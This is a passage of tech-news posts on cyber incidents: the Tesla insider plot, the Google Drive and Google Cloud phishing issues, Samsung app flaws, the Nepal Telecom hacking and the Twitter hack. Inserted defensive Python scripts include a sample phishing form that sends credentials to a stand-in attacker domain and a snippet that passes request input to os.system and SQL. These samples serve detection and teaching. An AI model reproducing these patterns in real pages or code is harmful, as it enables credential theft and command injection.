To reduce data security risk, such bidding is conducted electronically on a single portal, through the website of the Prime Minister’s Office.
Ironically, this facility couldn’t prevent a ‘technical issue’ on the website.
Technical Issue in a Controversial Contract
The contract for the construction of the railway trackbed was opened on the 28th. About 120 contractors, including joint ventures (JVs), had participated in the bidding.
For the evaluation of all these proposals, the evaluators of the Railway Department tried to download the proposals on bolpatra.com. However, they came to realize that they could not download the documents due to a technical problem.
After receiving complaints, the monitoring office asked to postpone the bidding process until the office recovers data. Accordingly, the Railway department has postponed the technical evaluation process.
The PPMO claimed that an unknown issue caused the technical problem on the website. However, a technician at the office said that the internal problem was a cyberattack. The team is trying to recover the lost data, but so far without success.
If recovery of data fails, this process will have to start from the beginning.
Legal Dispute Regarding the Contract
The railway contract is one of the disputed contracts. In fact, the issue is still pending in court.
There were also doubts about the legality of calling for contracts in a way that deemed only 18 companies technically competent, and about whether that created a genuinely competitive environment.
That is why this case had reached the Patan High Court, in a bid to stop the contract process for the construction of the trackbed. However, the court refused to issue an interim order, and so the bidding process resumed.
Meanwhile, the Development and Technology Committee of the Parliament had also instructed the department and the Ministry of Physical Infrastructure not to proceed with the process until the resolution of the land acquisition dispute and other issues of the railway.
The contract process went ahead despite the directives of the committee. Therefore, the committee had again sent a letter to the ministry and the department reminding them of the old decision.
The railway department itself had publicly signaled that it might back down, citing fears of irregularities in the railway construction.
However, once the process was under way, backing down was not possible without the intervention of a higher body. The department indicated that it would withdraw because the compensation dispute remained unresolved and the tender had become a four-sided dispute.
It is in this situation that the website problem has now arisen.
MP Rajendra Lingden said that the contract process was wrong in the first place, so it was better to postpone it. However, he said it is not good to have technical issues, because they could lead to a loss of confidence in the system.
Earnest employee saves the day and prevents a major cyber attack at Tesla.
A Tesla employee turned down an offer worth $1 Million and helped the FBI arrest a conspirator. This prevented a huge cyberattack on the tech giant Tesla.
The Story, as we know it
A conspirator by the name of Egor Igorevich Kriuchkov contacted a Russian-speaking, non-US citizen Tesla employee back on July 16. The employee was stationed at Tesla’s Gigafactory Nevada.
The conversation took place on WhatsApp, with the conspirator seeking to meet the employee in person. The meeting was held at a hotel in Reno, Nevada on August 1.
Kriuchkov initially befriended the employee and started hanging out with his associates. He was simply building enough trust to make an offer.
Finally, Kriuchkov told the Tesla employee about a ‘Special Project’ that required a Tesla insider to install malware on the company’s computer system. He asked the employee to install it manually once he received the malware.
In fact, the conspirator offered the employee a whopping $1 Million payout to carry out this cybercrime.
What could the malware do?
Well, the malware would allow the conspirators to carry out DDoS attacks on Tesla’s network. Moreover, it would give them access to private and confidential information on the company’s server.
They would probably have held the information for ransom.
Earnest Hero Turns Down a Tempting Offer
The Tesla employee turned down the offer and refused to help the cyber conspirators. Instead, the employee reported the approach to his employer, which in turn informed the FBI.
Soon, the FBI looked into the case by wiring the Tesla employee and keeping track of Kriuchkov’s movements.
On August 21, Kriuchkov informed the employee that there had been a change of plans and the project would be postponed by a few days. He guaranteed payment in Bitcoin.
The conspirator left after handing over a mobile phone, which he asked the employee to keep in Airplane mode until further contact.
The FBI followed him from Reno to Los Angeles (LA) and suspected a possible attempt to flee the country. They eventually arrested Kriuchkov on August 22 and charged him with “Conspiracy to Intentionally Cause Damage to a Protected Computer.”
Tesla Employee Received Praises
Tesla CEO Elon Musk took to Twitter to appreciate the earnest employee. He also acknowledged that the company had dodged a serious bullet.
This straight-up sounds like a plot of a crime movie. However, this also means that employees should remain vigilant about such threats.
Likewise, companies need to guard against such insider threats, as conspirators like these are lurking to exploit employees at all costs.
Let’s try putting ourselves in the employee’s shoes. What would we have done if we were offered such a huge sum?
This latest security issue on Google Drive resides in the manage versions functionality. In case you are not familiar with it, this feature allows file owners to upload a new version of an existing file.
You would expect Google Drive to replace an older version of a file with a new version of the same file. That much is true, but the surprising part is that it also allows uploading a version with a different extension.
For example, you have uploaded your thesis file with the filename ‘thesis.pdf,’ which means it is a PDF file having a .pdf extension.
The version feature should only accept a newer copy of the same file, but the flaw is that you can just as easily upload a file named ‘thesis.pdf.exe’ as the new version.
What does this mean?
This means that when you share this file with someone (or send it by mail), they might still be able to open the PDF from their browser. However, hitting the download button will download the ‘exe’ version of the file, which may be corrupt or malicious.
Here’s a demo video:
As you can see, Google did not even enforce the same extension when changing the file version.
The Hacker News even claims that Google was aware of this issue but left it unpatched.
How Can Malware Hackers Exploit Google Drive Vulnerability?
Spear-phishing scams typically attempt to trick users into giving up their credentials, such as account information, password, and so on.
If users click on a malicious link or attachment, then the attackers will have access to all the credentials.
This Google Drive security issue is no different. The inability to keep the extension consistent can allow threat actors to upload a file containing malware.
Users will unknowingly download the malware, which can give attackers access to the user’s system and credentials. What’s even worse is that Google Chrome implicitly trusts files downloaded from Google Drive.
Meanwhile, the demo video shows that other antivirus software or file-sharing platforms can detect the file as malicious.
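To show what the missing check looks like, here is an added example (not Google’s code, and not from the original post) that models the manage-versions step on an in-memory file store: the unchecked path accepts ‘thesis.pdf.exe’ as a new version of ‘thesis.pdf’, while the hardened path keeps the extension fixed and sniffs the content’s leading bytes. The store, the function names, the sample file bytes and the small magic-byte table are all constructed for this illustration.

```python
"""Constructed example: validating a 'new version' upload for a shared file.

Models the manage-versions behaviour the article describes. The store, the
sample bytes and the magic-byte table are constructed for this illustration.
"""
import os
from dataclasses import dataclass, field

# Leading bytes expected for a few declared extensions (constructed subset).
MAGIC_BY_EXTENSION = {
    ".pdf": (b"%PDF-",),
    ".png": (b"\x89PNG\r\n\x1a\n",),
    ".zip": (b"PK\x03\x04",),
}
# Leading bytes of things that should never be served under a document name:
# Windows PE ('MZ'), ELF binaries and shebang scripts.
EXECUTABLE_MAGIC = (b"MZ", b"\x7fELF", b"#!")


class RejectedVersion(ValueError):
    """Raised when a new version would change what the download actually is."""


@dataclass
class StoredFile:
    name: str
    data: bytes
    history: list = field(default_factory=list)  # previous (name, data) pairs


def version_update_allowed(old_name: str, new_name: str, new_data: bytes):
    """Return (ok, reason). ok is True only if the new version keeps the
    original extension and its content is consistent with that extension."""
    old_ext = os.path.splitext(old_name)[1].lower()
    new_ext = os.path.splitext(new_name)[1].lower()
    if new_ext != old_ext:
        return False, f"extension changed from {old_ext!r} to {new_ext!r}"
    if new_data.startswith(EXECUTABLE_MAGIC):
        return False, "content is an executable or script"
    expected = MAGIC_BY_EXTENSION.get(new_ext)
    if expected and not new_data.startswith(expected):
        return False, f"content does not look like a {new_ext} file"
    return True, "ok"


def upload_version_unchecked(stored: StoredFile, new_name: str, new_data: bytes):
    """Behaviour the article describes: any name is accepted as a new version,
    so a 'thesis.pdf' share can start downloading as 'thesis.pdf.exe'."""
    stored.history.append((stored.name, stored.data))
    stored.name, stored.data = new_name, new_data
    return stored


def upload_version_checked(stored: StoredFile, new_name: str, new_data: bytes):
    """Hardened variant: refuse any version that changes the file's type."""
    ok, reason = version_update_allowed(stored.name, new_name, new_data)
    if not ok:
        raise RejectedVersion(reason)
    return upload_version_unchecked(stored, new_name, new_data)


# Constructed sample content: minimal PDF headers and a PE ('MZ') header.
PDF_V1 = b"%PDF-1.4\n% thesis draft 1\n"
PDF_V2 = b"%PDF-1.4\n% thesis draft 2\n"
FAKE_EXE = b"MZ\x90\x00 constructed executable stub"


def demo():
    """Run both paths on the article's 'thesis.pdf' scenario."""
    weak = upload_version_unchecked(StoredFile("thesis.pdf", PDF_V1),
                                    "thesis.pdf.exe", FAKE_EXE)
    hardened = StoredFile("thesis.pdf", PDF_V1)
    results = []
    for name, data in [("thesis.pdf.exe", FAKE_EXE),   # extension changes
                       ("thesis.pdf", FAKE_EXE),       # right name, wrong bytes
                       ("thesis.pdf", PDF_V2)]:        # legitimate update
        try:
            upload_version_checked(hardened, name, data)
            results.append("accepted")
        except RejectedVersion as exc:
            results.append(f"rejected: {exc}")
    return {
        "weak_download_name": weak.name,          # 'thesis.pdf.exe'
        "hardened_results": results,
        "hardened_download_name": hardened.name,  # still 'thesis.pdf'
        "hardened_data": hardened.data,           # the legitimate PDF_V2
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value!r}")
```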
Have you noticed this issue before? Are cloud services becoming more vulnerable?
Sometimes we are unable to comprehend the advances the world is making in terms of digital transformation. And in those moments when we choose to ignore the threats that come with it, it is often too late. A report from Check Point Research described a phishing attack that exploited Google Cloud.
Yes! The clouds may not be the safest place, after all.
Threat actors were found exploiting Google Cloud to host malicious payloads and launch phishing attacks.
Google may have dealt with this vulnerability, but it is up to us to stay vigilant and protect our data. In this article, we will also discuss some ways you can do that, especially on cloud services.
Let’s break down the Google Cloud Phishing Journey.
How did it Happen?
First, threat actors uploaded a PDF to Google Drive. They disguised the PDF to resemble a Microsoft SharePoint notice, but in reality, it contained a link to an MS Access Document.
Image: Check Point
Once clicked, the link redirected the user to a phishing page hosted on storage.googleapis[.]com/asharepoint-unwearied-439052791/index.html.
The phishing page would then prompt the user to log in with their Office 365 or organization email and password.
After the user would enter the login credentials, the page redirected to a real PDF report published by a renowned global consulting firm.
And that’s the trick! Users wouldn’t be suspicious even for a second, because they would think they were viewing something useful.
The fact that the phishing page is hosted on Google Cloud Storage adds to the appearance of legitimacy.
For the same reason, it is also difficult for security professionals to identify or detect such phishing campaigns.
“However, viewing the phishing page’s source code has revealed that most of the resources are loaded from a website that belongs to the attackers, prvtsmtp[.]com:”, the report stated.
After further investigation of the website, researchers found that it resolved to a Ukrainian IP address.
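As an added example (not Check Point’s code, and not from the original article), the following script turns the report’s observation that the page’s resources were loaded from a domain other than the storage host into a check: it lists every external resource origin on a constructed copy of such a page, notes whether a credential form posts off-host, and gives a verdict. The bucket name, the HTML and the domain attacker-resources.example are placeholders constructed for this illustration.

```python
"""Constructed example: where does a login page hosted on cloud storage load
its resources from, and where does its form post?

The page URL (placeholder bucket), the HTML and the domain
attacker-resources.example are constructed for this illustration.
"""
from html.parser import HTMLParser
from urllib.parse import urljoin, urlparse

# Tag -> attribute that references another resource or a form target.
RESOURCE_ATTRS = {"script": "src", "link": "href", "img": "src",
                  "iframe": "src", "form": "action"}


class _PageCollector(HTMLParser):
    """Collect absolute resource URLs, form targets and password inputs."""

    def __init__(self, base_url):
        super().__init__()
        self.base_url = base_url
        self.resources = []      # (tag, absolute url)
        self.password_inputs = 0

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "input" and (a.get("type") or "").lower() == "password":
            self.password_inputs += 1
        attr = RESOURCE_ATTRS.get(tag)
        if attr and a.get(attr):
            # Relative references resolve against the page URL itself.
            self.resources.append((tag, urljoin(self.base_url, a[attr])))


def host_of(url):
    return (urlparse(url).hostname or "").lower()


def analyze_page(page_url, html):
    """Summarise where a page's resources come from and give a verdict."""
    collector = _PageCollector(page_url)
    collector.feed(html)
    page_host = host_of(page_url)
    external = [(t, u) for t, u in collector.resources if host_of(u) != page_host]
    off_host_forms = [u for t, u in external if t == "form"]
    ratio = len(external) / len(collector.resources) if collector.resources else 0.0
    credential_form = collector.password_inputs > 0
    # A credential form on a storage host that posts elsewhere, or that pulls
    # most of its assets from another domain, matches the pattern in the report.
    suspicious = credential_form and (bool(off_host_forms) or ratio >= 0.5)
    return {
        "page_host": page_host,
        "external_hosts": sorted({host_of(u) for _, u in external}),
        "external_ratio": round(ratio, 2),
        "off_host_form_targets": off_host_forms,
        "credential_form": credential_form,
        "verdict": "suspicious" if suspicious else "no finding",
    }


# Constructed sample: a SharePoint-style login page served from a bucket,
# with its stylesheet, script and form target on a separate attacker domain.
PAGE_URL = "https://storage.googleapis.com/BUCKET-PLACEHOLDER/index.html"
SAMPLE_HTML = """<html><head>
<link rel="stylesheet" href="https://attacker-resources.example/o365.css">
<script src="https://attacker-resources.example/collect.js"></script>
</head><body>
<img src="logo.png" alt="SharePoint">
<form method="post" action="https://attacker-resources.example/login.php">
  <input type="email" name="user">
  <input type="password" name="pass">
  <input type="submit" value="Open document">
</form></body></html>"""

# Constructed control: every reference stays on the hosting origin.
BENIGN_HTML = """<html><body>
<link rel="stylesheet" href="/style.css"><img src="logo.png">
<form action="/login"><input type="password" name="p"></form>
</body></html>"""


if __name__ == "__main__":
    print(analyze_page(PAGE_URL, SAMPLE_HTML))
    print(analyze_page(PAGE_URL, BENIGN_HTML))
```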
What Next?
Well, Google has a zero-tolerance policy. So, it immediately suspended the phishing URL and all those associated with it.
There have also been incidents in the past where threat actors hosted phishing pages on Dropbox and Microsoft Azure.
Check Point also suggested some precautionary measures to protect users against such phishing attacks.
Have a look at the following points:
Beware of lookalike domains and spelling errors. Unfamiliar email senders and spelling errors are a straight giveaway.
Take caution opening or downloading files received via email from unknown senders. Try to make sense of any suspicious call-to-action and subject line.
Ensure that you order products/services from an authentic source. One way to do that could be NOT clicking on promotional links in emails. Try to Google the desired service instead.
Beware of ‘special’ offers that could be nothing but a scam. For instance, ‘an exclusive cure for coronavirus for $150’. That should be a dead giveaway.
Try to keep separate passwords between different applications and accounts.
As they say, “Users’ mailboxes are the front door into your organization.”
Email security has become a necessity, which needs proper attention in organization architecture.
How often do you come across such potential scams or suspicious emails?
Ever since Instagram Reels marked its presence in the internet world, people haven’t stopped talking about how opportunistic this venture seems. Let’s discuss TikTok vs Instagram Reels once and for all. Was it pure coincidence or an opportunistic venture?
What is TikTok?
According to Wikipedia: “TikTok/Douyin is a Chinese video-sharing social networking service owned by ByteDance, a Beijing-based Internet technology company founded in 2012 by Zhang Yiming. It is used to create short music, lip-sync, dance, comedy and talent videos of 3 to 15 seconds, and short looping videos of 3 to 60 seconds.”
What is Instagram Reels?
Very similar to TikTok, Reels is Facebook’s recent rival venture against TikTok (as people claim). It was launched on August 5 in the US. Here, users can record and edit short videos with background music, akin to TikTok. The video length can be up to 15 seconds. However, it is not separate from the Instagram app itself; it can be considered an extension of Instagram’s wide range of features.
Was the Instagram Reels release just a coincidence?
We are all aware of the TikTok controversy. Its future has been hanging in the balance in the US. Similarly, owing to geopolitical issues, India has banned TikTok and some 58 other Chinese apps. Therefore, experts claim, this is an attempt by Facebook to seize the opportunity.
It’s no secret that Instagram Reels is very similar to the TikTok video-sharing platform. But the product head of Instagram recently told reporters that the release timing was just a coincidence; they had been planning it for a long time. Whatever the case, it will be interesting to see how Reels performs compared to TikTok.
Vishal Shah told reporters, “[TikTok] certainly didn’t invent short-form video, but they innovated it. We’ve been clear that formats in the past were inspired by other companies… I believe that consumers having choice results in better products.”
Number of Users [TikTok vs Reels]
Instagram has more than 1 billion global users, whereas TikTok has a little over 2.3 billion global downloads. In the US, TikTok has around 100 million users and Instagram between 100 and 150 million.
Instagram Reels was first launched in Brazil in November 2019 for testing purposes. Today, it has expanded to India, Germany, and some other countries. Slowly, it is planning to go global.
Meanwhile, it will be interesting to see how this rivalry moves forward. Will Instagram Reels sustain in the long run? Let us know in the comments below.
According to the Wall Street Journal, TikTok tracked Android users’ data for over a year, until November 2019. This is yet another blow for TikTok amid the recent turmoil the company has been facing.
The Android app reportedly collected the MAC addresses of devices, against Google’s privacy policy. The app collected a user’s MAC address as soon as the app was installed. The MAC address then acted as an advertising ID, based on which the company tracked users’ behavior for advertising purposes.
Google has barred developers from collecting the MAC addresses and IMEI numbers of Android devices since 2015. But TikTok violated the rule after finding a loophole in the policy. TikTok tracked users for 15 months, until November 2019. Other Android apps did the same; the number of apps involved in the breach was around 350.
With over 200 million users, TikTok’s biggest market outside of China was India. The company is facing a great deal of loss after the incident took place last June.
According to recent reports, TikTok is currently in talks with Reliance India to come up with an agreement to survive the situation.
A little background on TikTok
According to Wikipedia,” TikTok/Douyin is a Chinese video-sharing social networking service owned by ByteDance, a Beijing-based Internet technology company founded in 2012 by Zhang Yiming. It is used to create short music, lip-sync, dance, comedy and talent videos of 3 to 15 seconds, and short looping videos of 3 to 60 seconds.”
It will be interesting to see how TikTok overcomes these unprecedented events in the future. Will it be able to survive the political agendas concerning China and the other countries?
Meanwhile, Nepali users of TikTok have been very active and enjoying the platform to the fullest.
Have your say on this in the comment section below.
Facebook has open-sourced Pysa on GitHub. Pysa is a tool that finds and fixes bugs by analyzing code and how data flows through it. Pysa stands for Python Static Analyzer.
It is a security tool built upon Facebook’s type checker for Python. Pysa helps detect a wide range of issues, including common web app security issues and vulnerable code snippets, and helps Facebook scale its application security work for Python.
“Pysa is an automated analyzer that controls quality and security in the codebase.”, said Facebook.
Python code powers millions of Instagram’s servers. To manage such codebases, security tools like Pysa are essential. Pysa identifies bugs in almost real time, whereas manual review takes days. The quick response helps them eliminate issues before they reach their systems.
“We’ve made it open-sourced with many definitions to help it find security issues”, stated Facebook on Saturday. Pysa detected 44% of the security bugs in Instagram’s server-side Python.
Facebook also built a static-analysis tool called Zoncolan. It analyzes more than 100 million lines of Hack code. Engineers have prevented numerous security issues through Zoncolan.
“The success of Zoncolan is what motivated us to build Pysa”, said Facebook. Built internally by Facebook, Pysa has been fine-tuned through months of testing and improvements.
Another upside of Pysa is its extensibility. The tool can easily be extended to adapt to other frameworks.
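To illustrate the source-to-sink data-flow question Pysa answers, here is an added toy taint tracker (not Pysa’s code, and far simpler than it) that walks a Python AST, marks variables assigned from a constructed set of user-controlled sources, clears the mark when a sanitizer is applied, and reports any sink call that receives tainted data. The source, sink and sanitizer lists and SAMPLE_CODE are constructed for this illustration.

```python
"""Constructed example: a toy intra-procedural taint tracker over Python's AST.

Source, sink and sanitizer names below are a constructed subset; SAMPLE_CODE
is a constructed snippet written to be analysed, not code to run.
"""
import ast

SOURCES = {"request.GET", "request.POST", "input"}        # user-controlled
SINKS = {"os.system", "subprocess.call", "cursor.execute", "eval"}
SANITIZERS = {"shlex.quote", "html.escape", "int"}


def dotted_name(node):
    """'request.GET' for Attribute(Name('request'), 'GET'); None otherwise."""
    if isinstance(node, ast.Name):
        return node.id
    if isinstance(node, ast.Attribute):
        base = dotted_name(node.value)
        return f"{base}.{node.attr}" if base else None
    return None


class TaintTracker(ast.NodeVisitor):
    """Forward taint propagation over statements in source order."""

    def __init__(self):
        self.tainted = set()     # variable names currently holding taint
        self.findings = []       # (sink name, line number) pairs

    def is_tainted(self, expr):
        if dotted_name(expr) in SOURCES:          # e.g. request.GET
            return True
        if isinstance(expr, ast.Name):
            return expr.id in self.tainted
        if isinstance(expr, ast.Call):
            func = dotted_name(expr.func)
            if func in SANITIZERS:               # sanitizer output is clean
                return False
            if func in SOURCES:                  # e.g. input()
                return True
            return any(self.is_tainted(a) for a in expr.args)
        if isinstance(expr, (ast.Attribute, ast.Subscript)):
            return self.is_tainted(expr.value)   # request.GET["host"]
        if isinstance(expr, ast.BinOp):          # "cmd " + host
            return self.is_tainted(expr.left) or self.is_tainted(expr.right)
        if isinstance(expr, ast.JoinedStr):      # f"...{host}..."
            return any(self.is_tainted(v.value) for v in expr.values
                       if isinstance(v, ast.FormattedValue))
        if isinstance(expr, (ast.Tuple, ast.List)):
            return any(self.is_tainted(e) for e in expr.elts)
        return False

    def visit_Assign(self, node):
        for target in node.targets:
            if isinstance(target, ast.Name):
                if self.is_tainted(node.value):
                    self.tainted.add(target.id)
                else:
                    self.tainted.discard(target.id)   # overwritten with clean data
        self.generic_visit(node)

    def visit_Call(self, node):
        sink = dotted_name(node.func)
        if sink in SINKS and any(self.is_tainted(a) for a in node.args):
            self.findings.append((sink, node.lineno))
        self.generic_visit(node)


def find_taint_flows(source_code):
    """Return [(sink, line), ...] for every sink reached by tainted data."""
    tracker = TaintTracker()
    tracker.visit(ast.parse(source_code))
    return tracker.findings


# Constructed snippet to analyse: two flows reach a sink, two are sanitized.
SAMPLE_CODE = '''\
import os, shlex
def ping(request, cursor):
    host = request.GET["host"]
    os.system("ping -c1 " + host)                          # line 4: flow
    os.system("ping -c1 " + shlex.quote(host))             # line 5: sanitized
    cursor.execute(f"SELECT 1 FROM t WHERE h = '{host}'")  # line 6: flow
    count = int(request.GET["n"])
    cursor.execute("SELECT 1 LIMIT %s", (count,))          # line 8: sanitized
'''


if __name__ == "__main__":
    for sink, line in find_taint_flows(SAMPLE_CODE):
        print(f"tainted data reaches {sink} at line {line}")
```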
New research has revealed a serious security vulnerability in ‘Find My Mobile’, an Android app that comes pre-installed on most Samsung smartphones.
Char49, a Portugal-based cybersecurity provider, revealed its findings on the Android app at the DEF CON conference last week.
The research suggests that this flaw had the potential to allow remote attackers to track victims’ real-time location and monitor their call activities.
In addition, the attackers could even check messages and delete data from the phone.
According to Char49’s Pedro Umbelino, attackers could cause serious privacy implications via IMEI and location tracking. Moreover, it could even have catastrophic impacts such as permanent denial of service via phone lock and factory reset.
“This attack was tested successfully on different devices (Samsung Galaxy S7, S8, and S9+)”, the report states.
Samsung addressed these vulnerabilities after flagging the exploit as a “high impact vulnerability”.
Vulnerabilities… More than One?
According to Char49, there were a total of four different vulnerabilities in the Find My Mobile app. In fact, attackers could have exploited the targeted device using a malicious app.
The app checks for a specific file on the phone’s SD card (“/mnt/sdcard/fmm.prop”) in order to load a URL (“mg.URL”). A malicious app can therefore create this file, which a bad actor can use to tamper with the app’s communications with the server.
In this way, the attacker can gain access to a range of the user’s personal information.
Furthermore, the malicious app installed on the device uses an exploit chain that leverages two different unprotected broadcast receivers. These allow commands intended for Samsung’s servers to be redirected from the Find My Mobile app to a different server under the attacker’s control.
The malicious server then forwards the request to the legitimate server and retrieves the response, but not before injecting its own commands into the server responses.
Consequently, the attackers now have full control over the flawed Samsung device.
And ironically, an app that’s supposed to safeguard users against information loss becomes the villain. The flaw basically defeats the app’s very purpose.
News of unethical hacking is increasingly common these days. In a recent incident, the hacker of NTC’s server has been released on bail.
Diwakar Deuja, a Nepal Government employee, hacked Nepal Telecom‘s server and then made a recharge of Rs. 24,000. After almost 15 days, the Kathmandu District Court released him on bail on July 29.
The bail amount was Rs. 50,000. As per the claim, he had misused around Rs. 24,000 while recharging.
Deuja was working at the Urban Development and Building Office, Dhankuta as a computer operator. Judge Kamal Prasad Pokhrel made the verdict on this matter.
Before this incident, the police had been claiming that Deuja had also taken financial advantage by controlling various packages of Nepal Telecom.
Nepal Telecom had filed the complaint on July 27. The Central Investigation Bureau (CIB) of Nepal Police then initiated the investigation. Meanwhile, the Bureau had already arrested Deuja in Dhankuta on July 15.
As per the Electronic Transactions Act 2063, the CIB had sent him to the Nepal Police Cyber Bureau.
These types of incidents are growing day by day. What do you feel is the root cause behind it? Why are the civil servants involved in such embarrassing activities?
Kathmandu. Unless you are living under a rock, cases of security breaches are not news to you. Keeping that in mind, the Nepal Telecommunications Authority [NTA] has made security audits of the concerned parties mandatory.
The regulatory body has also asked the telecommunication and ISP companies to submit the audit report to the authority.
Recent hacking incidents have been painting a negative picture of the ISP and telecommunication sectors. Internet users have grave concerns about their privacy. Hence, the authority has addressed the issue.
The body has taken the decision considering the nationwide criticism of these incidents.
NTA spokesperson Meen Prasad Aryal said that they issued the directive to improve the situation. Additionally, they aim to prevent the recurrence of such incidents.
“If the service providers do not follow the directives of the regulator, they may be fined up to Rs 50,000,” he said. Based on the Telecommunications Act 2053 BS, the regulatory body addressed the issue.
He also said that the service providers should compensate for the damage caused by non-compliance.
Have your say on this decision in the comment section.
Nepal Stock Exchange (NEPSE) has recently confirmed that there have been attempts to extract a large number of details from its website using various codes.
NEPSE, the only stock exchange company in Nepal, has warned to take legal actions against those who try to block the service by establishing unauthorized access to its official website.
Company Spokesperson Murahari Parajuli said that there were delays in the display of transaction details related to NepalStock.com.np and NepalStock.com. Moreover, there was an issue due to which transactions were not visible for a certain period of time in certain areas.
A study by NEPSE found that there were attempts to extract a large amount of data from all the websites using different codes.
Consequently, there was an artificial increase in the number of requests to view details on the website. The company noted that this causes inconvenience to the general public.
The company is taking technical measures to tackle this issue. Furthermore, NEPSE has warned that it will take legal action if such illegal efforts continue in the coming days.
Spokesperson Parajuli said that the site became overloaded by the excessive data pulling.
Among the culprits were Banks and financial institutes, portfolio management companies, and online sites.
For now, he said, the company has issued the information for awareness. However, the company won’t hesitate to go to the police if the activity does not stop.
The primary server of the National Information Technology Center (NITC) inside Singha Durbar went down on Saturday (July 25).
The server of NITC manages the government data center. Experts say that the government’s main server went down because it was not managed properly.
However, Ramesh Pokharel, Information Officer at the Center, said that the server went down due to a nearby transformer.
“A nearby transformer has collapsed due to a power outage. The shock also damaged both our generators in the data center which caused the problem since 9:30 am,” he said. “Even now the power is unstable.”
Consequently, all government sites went down.
Information Officer Pokharel informed us that the center has finished replacing the generator’s battery. However, according to him, the websites were still not operational due to the high number of hits on the data center.
Important websites including the Prime Minister’s Office, Public Service Commission, and the Ministry of Finance had stopped working following the problem. Likewise, the email server of the Government of Nepal also went down.
Pokharel further added that although the Center was operating a recovery data center in Hetauda, it was not working.
Generally, both data centers manage government servers. Thus, one would assume that service could be maintained using the server on the other side. But that was not the case.
Pokharel claimed that even though there was a backup in Hetauda, they could not use it as the DNS was not up.
However, experts say that such problems are recurring due to the poor management of NITC. Most sites have become operational now but NITC is looking for potential damage due to the issue.
Women in Big Data-Nepal Successfully Hosts Virtual Panel Discussion on Data Breach and Security in Nepal.
Women in Big Data (WiBD)-Nepal organized a virtual panel discussion session titled “Belt Your Data” to share knowledge and facts on the status of data security and breaches in Nepal. The event was hosted on the Zoom Platform on 19 July, Sunday. A total of 125 attendees participated in the session.
The three panelists were Dovan Rai, Narayan Koirala, and Prabin Subedi. The session was moderated by Anjani Phyual (Asia lead of WiBD) and Yudina Poudel (Executive Member-Networking, WiBD). All the active members of WiBD-Nepal were also present in the event.
The event was organized into three phases, moving from “What is data?” to “How does a data breach occur?” to “How to prevent a data breach?”, all with a focus on the context of Nepal. Numerous laws and acts specific to data and data breaches were discussed, which gave the general audience a detailed understanding of the current policies in Nepal.
Sharing her ideas in the session, Dovan Rai – a Data Scientist and Education Coordinator – said, “Data Security is like wearing a mask for preventing COVID-19; everyone should protect their data to prevent data breach”. She also shared examples of a few globally known data hacks and breaches to raise the audience's awareness.
Similarly, Narayan Koirala, who has profound knowledge in the technical field, said, “Both data protection and data breach are growing side by side in Nepal. The level of data security has reached the next level, and depth of data defense mechanisms has also increased in the country”. This reassured the audience amid the concern about data breaches and their negative impact on our data.
Likewise, the third panelist, Prabin Subedi, an active practicing lawyer in Nepal, shared, “Along with being aware of the laws and acts related to data in Nepal, one should be more aware of their data and its privacy.” Moreover, he said that Nepal is trying its best to implement data-related laws and has become one of the leading countries in Asia, and in the world, in practicing such laws.
The event also included an active question-and-answer session between the audience and the panelists. Feedback gathered through an audience poll suggested the event was fruitful for all the participants. Interactive polls held during the discussion added interest and kept the audience engaged.
After the success of this first event, Women in Big Data Nepal is looking forward to organizing more activities that can help develop awareness and educate people on data-related topics.
Women in Big Data-Nepal is all set to organize a Virtual Panel Discussion on the topic ‘Belt Your Data’ on 19 July, Sunday. The event aims to share knowledge and facts on data breach cases focusing more on the context of Nepal and is being conducted on the Zoom platform. Over 500 interested audiences are expected to participate in the session.
Women in Big Data-Nepal to host Panel Discussion on ‘Belt Your Data’ for Data Enthusiasts. The program aims to share knowledge and facts on data breach cases focusing on the context of Nepal and promote data literacy and awareness.
Data breaches – incidents that expose confidential or protected information – have been increasing in Nepal in recent times. In this digital age, data is wealth. It should be kept safe and used wisely. This panel discussion intends to give its participants an awareness of data breaches and ways to prevent them.
The three panelists of the event are: Dovan Rai – a Data scientist & Education Coordinator, Narayan Koirala – Managing Director of Eminence Ways Pvt. Ltd., and Prabin Subedi – a Lawyer specialized in Information Communication Technology Law.
During the event, the audience can put forward any topic-related concerns to the panelists and have a one-to-one discussion on the topic. Analyzing a few recent data breach cases in Nepal, this event aims to provide its attendees with all the necessary precautions and laws one should know regarding data and its use.
The ‘Belt Your Data’ event is a great opportunity for the audience to gather ideas on the domain of ‘Data Breach’ from experts, since data has become the most crucial part of our lives and needs better privacy protection in this 21st century.
All interested participants, regardless of gender, can register for the event by filling out this form.
Computer operator of Urban Development and Building Office, Dhankuta, has been arrested for hacking the server system of Nepal Telecom’s mobile app.
Central Bureau of Investigation (CIB) arrested Diwakar Deuja (28) of Pakhribas Municipality-5 in Dhankuta on Wednesday.
The Police have also recovered two laptops and two mobile phones from him after the arrest.
The arrestee hacked the system both to use and sell Nepal Telecom’s packages illegally, according to the Bureau.
On June 26, Nepal Telecom lodged a complaint alleging that they had suffered losses due to repeated hacking using untraceable internet technology. The complaint stated that it had damaged the company’s revenue and its business image.
The police arrested Deuja while investigating the same complaint.
Dilli Ram Adhikari, Managing Director of Nepal Telecom says, “Telecom immediately came to know about the suspicious activity regarding unauthorized access and filed the complaint. With help from CIB, we managed to arrest the suspect.”
He also said that Telecom was able to avoid a huge loss by putting an end to the illegal activity in its initial phase.
Preparations are underway to take necessary action against the arrestee as per the Electronic Transactions Act 2063 BS.
Furthermore, the bureau has sent a cyber bureau to Kathmandu for further investigation.
Billionaires Bill Gates, Elon Musk, and Jeff Bezos are among the many prominent personalities who suffered a major Twitter hack.
The official Twitter accounts of such popular people and also companies were hacked in an apparent Bitcoin scam.
Moreover, the official accounts of Barack Obama, Joe Biden, and Kanye West tweeted requesting a donation of a thousand dollars in cryptocurrency (Bitcoin).
“Everyone is asking me to give back,” a tweet from Bill Gates’ account said. “You send $1,000, I send you back $2,000.”
In fact, companies like Apple also fell victim to the cyberattack. “We are giving back to our community,” said a tweet from Apple’s official account. “We support Bitcoin and we believe you should too!”
How did Twitter Handle the Situation?
Twitter removed all these “fake” tweets within a few minutes of their posting. It also took immediate action to stop verified accounts (those marked with blue ticks) from tweeting altogether.
CEO Jack Dorsey tweeted on Wednesday, “Tough day for us at Twitter. We all feel terrible this happened.”
He said that Twitter had begun diagnosing the attack and would share everything as soon as it found more information.
Similarly, the social media giant denied password reset requests and disabled other “account functions” for a while.
Worst Social Media Hack To Date?
At least that is what Dmitri Alperovitch, co-founder of the cybersecurity company CrowdStrike, said, according to a BBC report.
